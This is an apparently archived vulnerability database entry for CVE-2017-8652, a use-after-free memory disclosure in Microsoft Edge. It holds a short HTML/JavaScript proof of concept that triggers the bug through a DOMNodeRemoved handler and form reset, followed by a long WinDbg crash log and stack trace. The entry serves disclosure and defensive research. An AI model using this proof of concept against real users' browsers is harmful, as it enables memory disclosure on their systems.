source | https://packetstormsecurity.com/files/143695/Microsoft-Edge-textarea.defaultValue-Memory-Disclosure.html |
title | Microsoft Edge textarea.defaultValue Memory Disclosure |
Seebug
bulletinFamily | exploit |
description | There is a use-after free vulnerability in Microsoft Edge that can lead to memory disclosure. The vulnerability has been confirmed on Windows 10 Enterprise 64-bit (OS version 1607, OS build 14393.1198), Microsoft Edge 38.14393.1066.0, Microsoft EdgeHTML 14.14393. ### PoC: ``` ========================================== <!-- saved from url=(0014)about:internet --> <script> var n = 0; function go() { document.addEventListener("DOMNodeRemoved", eventhandler); eventhandler(); } function eventhandler() { n++; if(n==5) return; //prevent going into an infinite recursion t.defaultValue = "aaaaaaaaaaaaaaaaaaaa"; f.reset(); } </script> <body onload=go()> <form id="f"> <textarea id="t">aaa</textarea> ========================================= ``` This seems to be the same bug as https://bugs.chromium.org/p/project-zero/issues/detail?id=1076 only that one is in IE and this one is in Edge. I don't have symbols for the latest Edge after May update, so crash log doesn't make much sense but here it is anyway: ``` ========================================= (1618.1258): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\SYSTEM32\edgehtml.dll - edgehtml!Ordinal125+0x6446c: 00007ffe`843d615c 6641393e cmp word ptr [r14],di ds:000001fa`3389cfd4=???? 0:013> !heap -p -a 000001fa`3389cfd4 address 000001fa3389cfd4 found in _DPH_HEAP_ROOT @ 1f20b961000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) 1fa33116138: 1fa3389c000 2000 00007ffe9fb1b90b ntdll!RtlDebugReAllocateHeap+0x0000000000000047 00007ffe9fadcbfe ntdll!RtlpReAllocateHeapInternal+0x000000000008729e 00007ffe9fa55941 ntdll!RtlReAllocateHeap+0x0000000000000031 00007ffe845cc2fa edgehtml!CreateWebDriverAdapter+0x00000000000504ba 00007ffe845cbd74 edgehtml!CreateWebDriverAdapter+0x000000000004ff34 00007ffe8462fbb8 edgehtml!Ordinal107+0x0000000000056a48 00007ffe84d05143 edgehtml!Ordinal106+0x0000000000018e63 00007ffe845ab544 edgehtml!CreateWebDriverAdapter+0x000000000002f704 00007ffe846b0747 edgehtml!Ordinal107+0x00000000000d75d7 00007ffe84ae5c8f edgehtml!ClearPhishingFilterData+0x00000000000beeaf 00007ffe84792bb5 edgehtml!DllEnumClassObjects+0x0000000000043245 00007ffe83c41227 chakra!DllGetClassObject+0x0000000000001d97 00007ffe83c7a3d7 chakra!MemProtectHeapUnrootAndZero+0x00000000000038e7 00007ffe83aef541 chakra!JsProjectWinRTNamespace+0x0000000000046621 000001fa1cf7057e +0x000001fa1cf7057e 0:013> r rax=0000000000000000 rbx=000001fa2d058a40 rcx=000001f212910000 rdx=0000004d44824f5c rsi=0000000000000000 rdi=0000000000000000 rip=00007ffe843d615c rsp=0000004d44824f10 rbp=0000004d44825010 r8=00000000ffffffff r9=000001f212910000 r10=00007ffe85156fd0 r11=000001f212841a90 r12=0000000000000000 r13=0000000000000014 r14=000001fa3389cfd4 r15=000001f2128e8840 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 edgehtml!Ordinal125+0x6446c: 00007ffe`843d615c 6641393e cmp word ptr [r14],di ds:000001fa`3389cfd4=???? 0:013> k # Child-SP RetAddr Call Site 00 0000004d`44824f10 00007ffe`844bc561 edgehtml!Ordinal125+0x6446c 01 0000004d`44826190 00007ffe`8459a535 edgehtml!Ordinal105+0x13631 02 0000004d`448261e0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e6f5 03 0000004d`44826340 00007ffe`84d03e81 edgehtml!Ordinal106+0x18f9e 04 0000004d`448263c0 00007ffe`84447753 edgehtml!Ordinal106+0x17ba1 05 0000004d`448263f0 00007ffe`8453341c edgehtml!Ordinal125+0xd5a63 06 0000004d`448264e0 00007ffe`847afc55 edgehtml!GetWebPlatformObject+0xbb4c *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\SYSTEM32\chakra.dll - 07 0000004d`44826520 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x602e5 08 0000004d`44826550 000001fa`1cf70641 chakra!DllGetClassObject+0x1d97 09 0000004d`44826630 00007ffe`83cf90a3 0x000001fa`1cf70641 0a 0000004d`448266c0 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013 0b 0000004d`44826710 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73 0c 0000004d`44826770 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c 0d 0000004d`44826860 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56 0e 0000004d`448268d0 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9 0f 0000004d`44826970 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1 10 0000004d`44826a00 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac 11 0000004d`44826aa0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add 12 0000004d`44826af0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28 13 0000004d`44826b30 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7 14 0000004d`44826cb0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7 15 0000004d`44826d30 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a 16 0000004d`44826e90 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4 17 0000004d`44826ed0 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1 18 0000004d`448271a0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876 19 0000004d`448271f0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132 1a 0000004d`44827360 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732 1b 0000004d`448273a0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9 1c 0000004d`448274b0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d 1d 0000004d`44827610 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e 1e 0000004d`44827690 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a 1f 0000004d`448276c0 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704 20 0000004d`448277c0 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7 21 0000004d`44827800 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf 22 0000004d`44827840 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245 23 0000004d`44827870 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97 24 0000004d`44827950 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7 25 0000004d`44827a30 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621 26 0000004d`44827af0 00007ffe`83cf90a3 0x000001fa`1cf7057e 27 0000004d`44827b80 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013 28 0000004d`44827bd0 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73 29 0000004d`44827c30 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c 2a 0000004d`44827d20 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56 2b 0000004d`44827d90 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9 2c 0000004d`44827e30 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1 2d 0000004d`44827ec0 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac 2e 0000004d`44827f60 00007ffe`84650b98 edgehtml!Ordinal107+0x77add 2f 0000004d`44827fb0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28 30 0000004d`44827ff0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7 31 0000004d`44828170 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7 32 0000004d`448281f0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a 33 0000004d`44828350 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4 34 0000004d`44828390 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1 35 0000004d`44828660 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876 36 0000004d`448286b0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132 37 0000004d`44828820 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732 38 0000004d`44828860 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9 39 0000004d`44828970 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d 3a 0000004d`44828ad0 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e 3b 0000004d`44828b50 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a 3c 0000004d`44828b80 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704 3d 0000004d`44828c80 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7 3e 0000004d`44828cc0 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf 3f 0000004d`44828d00 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245 40 0000004d`44828d30 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97 41 0000004d`44828e10 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7 42 0000004d`44828ef0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621 43 0000004d`44828fb0 00007ffe`83cf90a3 0x000001fa`1cf7057e 44 0000004d`44829040 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013 45 0000004d`44829090 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73 46 0000004d`448290f0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c 47 0000004d`448291e0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56 48 0000004d`44829250 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9 49 0000004d`448292f0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1 4a 0000004d`44829380 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac 4b 0000004d`44829420 00007ffe`84650b98 edgehtml!Ordinal107+0x77add 4c 0000004d`44829470 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28 4d 0000004d`448294b0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7 4e 0000004d`44829630 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7 4f 0000004d`448296b0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a 50 0000004d`44829810 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4 51 0000004d`44829850 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1 52 0000004d`44829b20 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876 53 0000004d`44829b70 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132 54 0000004d`44829ce0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732 55 0000004d`44829d20 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9 56 0000004d`44829e30 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d 57 0000004d`44829f90 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e 58 0000004d`4482a010 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a 59 0000004d`4482a040 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704 5a 0000004d`4482a140 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7 5b 0000004d`4482a180 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf 5c 0000004d`4482a1c0 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245 5d 0000004d`4482a1f0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97 5e 0000004d`4482a2d0 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7 5f 0000004d`4482a3b0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621 60 0000004d`4482a470 00007ffe`83cf90a3 0x000001fa`1cf7057e 61 0000004d`4482a500 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013 62 0000004d`4482a550 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73 63 0000004d`4482a5b0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c 64 0000004d`4482a6a0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56 65 0000004d`4482a710 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9 66 0000004d`4482a7b0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1 67 0000004d`4482a840 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac 68 0000004d`4482a8e0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add 69 0000004d`4482a930 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28 6a 0000004d`4482a970 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7 6b 0000004d`4482aaf0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7 6c 0000004d`4482ab70 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a 6d 0000004d`4482acd0 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4 6e 0000004d`4482ad10 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1 6f 0000004d`4482afe0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876 70 0000004d`4482b030 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132 71 0000004d`4482b1a0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732 72 0000004d`4482b1e0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9 73 0000004d`4482b2f0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d 74 0000004d`4482b450 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e 75 0000004d`4482b4d0 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a 76 0000004d`4482b500 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704 77 0000004d`4482b600 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7 78 0000004d`4482b640 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf 79 0000004d`4482b680 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245 7a 0000004d`4482b6b0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97 7b 0000004d`4482b790 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7 7c 0000004d`4482b870 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621 7d 0000004d`4482b930 00007ffe`83cf90a3 0x000001fa`1cf7057e 7e 0000004d`4482b9c0 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013 7f 0000004d`4482ba10 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73 80 0000004d`4482ba70 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c 81 0000004d`4482bb60 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56 82 0000004d`4482bbd0 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9 83 0000004d`4482bc70 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1 84 0000004d`4482bd00 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac 85 0000004d`4482bda0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add 86 0000004d`4482bdf0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28 87 0000004d`4482be30 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7 88 0000004d`4482bfb0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7 89 0000004d`4482c030 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a 8a 0000004d`4482c190 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4 8b 0000004d`4482c1d0 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1 8c 0000004d`4482c4a0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876 8d 0000004d`4482c4f0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132 8e 0000004d`4482c660 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732 8f 0000004d`4482c6a0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9 90 0000004d`4482c7b0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d 91 0000004d`4482c910 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e 92 0000004d`4482c990 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a 93 0000004d`4482c9c0 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704 94 0000004d`4482cac0 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7 95 0000004d`4482cb00 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf 96 0000004d`4482cb40 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245 97 0000004d`4482cb70 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97 98 0000004d`4482cc50 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7 99 0000004d`4482cd30 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621 9a 0000004d`4482cdf0 00007ffe`83cf90a3 0x000001fa`1cf7057e 9b 0000004d`4482ce80 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013 9c 0000004d`4482ced0 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73 9d 0000004d`4482cf30 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c 9e 0000004d`4482d020 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56 9f 0000004d`4482d090 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9 a0 0000004d`4482d130 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1 a1 0000004d`4482d1c0 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac a2 0000004d`4482d260 00007ffe`84650b98 edgehtml!Ordinal107+0x77add a3 0000004d`4482d2b0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28 a4 0000004d`4482d2f0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7 a5 0000004d`4482d470 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7 a6 0000004d`4482d4f0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a a7 0000004d`4482d650 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4 a8 0000004d`4482d690 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1 a9 0000004d`4482d960 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876 aa 0000004d`4482d9b0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132 ab 0000004d`4482db20 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732 ac 0000004d`4482db60 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9 ad 0000004d`4482dc70 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d ae 0000004d`4482ddd0 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e af 0000004d`4482de50 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a b0 0000004d`4482de80 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704 b1 0000004d`4482df80 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7 b2 0000004d`4482dfc0 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf b3 0000004d`4482e000 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245 b4 0000004d`4482e030 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97 b5 0000004d`4482e110 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7 b6 0000004d`4482e1f0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621 b7 0000004d`4482e2b0 00007ffe`83cf90a3 0x000001fa`1cf7057e b8 0000004d`4482e340 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013 b9 0000004d`4482e390 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73 ba 0000004d`4482e3f0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c bb 0000004d`4482e4e0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56 bc 0000004d`4482e550 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9 bd 0000004d`4482e5f0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1 be 0000004d`4482e680 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac bf 0000004d`4482e720 00007ffe`84650b98 edgehtml!Ordinal107+0x77add c0 0000004d`4482e770 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28 c1 0000004d`4482e7b0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7 c2 0000004d`4482e930 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7 c3 0000004d`4482e9b0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a c4 0000004d`4482eb10 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4 c5 0000004d`4482eb50 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1 c6 0000004d`4482ee20 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876 c7 0000004d`4482ee70 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132 c8 0000004d`4482efe0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732 c9 0000004d`4482f020 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9 ca 0000004d`4482f130 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d cb 0000004d`4482f290 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e cc 0000004d`4482f310 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a cd 0000004d`4482f340 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704 ce 0000004d`4482f440 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7 cf 0000004d`4482f480 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf d0 0000004d`4482f4c0 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245 d1 0000004d`4482f4f0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97 d2 0000004d`4482f5d0 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7 d3 0000004d`4482f6b0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621 d4 0000004d`4482f770 00007ffe`83cf90a3 0x000001fa`1cf7057e d5 0000004d`4482f800 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013 d6 0000004d`4482f850 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73 d7 0000004d`4482f8b0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c d8 0000004d`4482f9a0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56 d9 0000004d`4482fa10 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9 da 0000004d`4482fab0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1 db 0000004d`4482fb40 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac dc 0000004d`4482fbe0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add dd 0000004d`4482fc30 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28 de 0000004d`4482fc70 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7 df 0000004d`4482fdf0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7 e0 0000004d`4482fe70 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a e1 0000004d`4482ffd0 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4 e2 0000004d`44830010 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1 e3 0000004d`448302e0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876 e4 0000004d`44830330 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132 e5 0000004d`448304a0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732 e6 0000004d`448304e0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9 e7 0000004d`448305f0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d e8 0000004d`44830750 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e e9 0000004d`448307d0 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a ea 0000004d`44830800 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704 eb 0000004d`44830900 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7 ec 0000004d`44830940 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf ed 0000004d`44830980 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245 ee 0000004d`448309b0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97 ef 0000004d`44830a90 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7 f0 0000004d`44830b70 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621 f1 0000004d`44830c30 00007ffe`83cf90a3 0x000001fa`1cf7057e f2 0000004d`44830cc0 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013 f3 0000004d`44830d10 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73 f4 0000004d`44830d70 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c f5 0000004d`44830e60 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56 f6 0000004d`44830ed0 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9 f7 0000004d`44830f70 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1 f8 0000004d`44831000 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac f9 0000004d`448310a0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add fa 0000004d`448310f0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28 fb 0000004d`44831130 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7 fc 0000004d`448312b0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7 fd 0000004d`44831330 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a fe 0000004d`44831490 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4 ff 0000004d`448314d0 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1 ========================================= ``` |
id | SSV:96345 |
last seen | 2017-11-19 |
modified | 2017-08-17 |
published | 2017-08-17 |
reporter | Root |
source | https://www.seebug.org/vuldb/ssvid-96345 |
title | Microsoft Edge Information Disclosure Vulnerability(CVE-2017-8652) |
References
- http://www.securityfocus.com/bid/100047
- http://www.securityfocus.com/bid/100047
- http://www.securitytracker.com/id/1039101
- http://www.securitytracker.com/id/1039101
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8652
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8652
- https://www.exploit-db.com/exploits/42445/
- https://www.exploit-db.com/exploits/42445/